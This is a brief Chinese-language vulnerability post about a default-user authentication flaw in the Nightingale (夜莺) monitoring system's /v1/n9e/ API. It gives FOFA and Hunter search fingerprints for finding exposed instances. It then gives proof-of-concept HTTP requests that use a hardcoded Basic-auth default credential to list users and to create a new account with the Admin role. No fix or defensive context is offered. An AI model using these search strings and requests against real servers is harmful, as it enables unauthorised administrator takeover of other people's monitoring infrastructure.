夜莺开源监控系统存在默认用户漏洞
夜莺开源监控系统存在默认用户漏洞,/v1/n9e/接口401鉴权存在默认用户
fofa
icon_hash="-2047686847"
hunter
web.body="icon-yijigaojing"
poc
GET /v1/n9e/users HTTP/1.1
Host: monitor.xxxx.com
Cache-Control: max-age=0
Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==
POST /v1/n9e/users HTTP/1.1
Host:
Cache-Control: max-age=0
Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==
Content-Type: application/json
Content-Length: 61
{"Username":"test","Password":"test","Roles":["Admin"]}
闽公网安备35020302035932号